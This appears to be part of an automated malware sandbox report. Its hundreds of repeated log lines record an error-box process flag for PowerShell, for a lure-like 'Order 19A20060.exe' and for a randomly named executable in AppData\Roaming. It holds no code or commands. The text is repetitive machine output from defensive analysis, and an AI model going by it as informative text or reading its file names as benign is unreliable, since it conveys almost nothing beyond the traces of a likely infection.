                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeProcess information set: NOOPENFILEERRORBOX
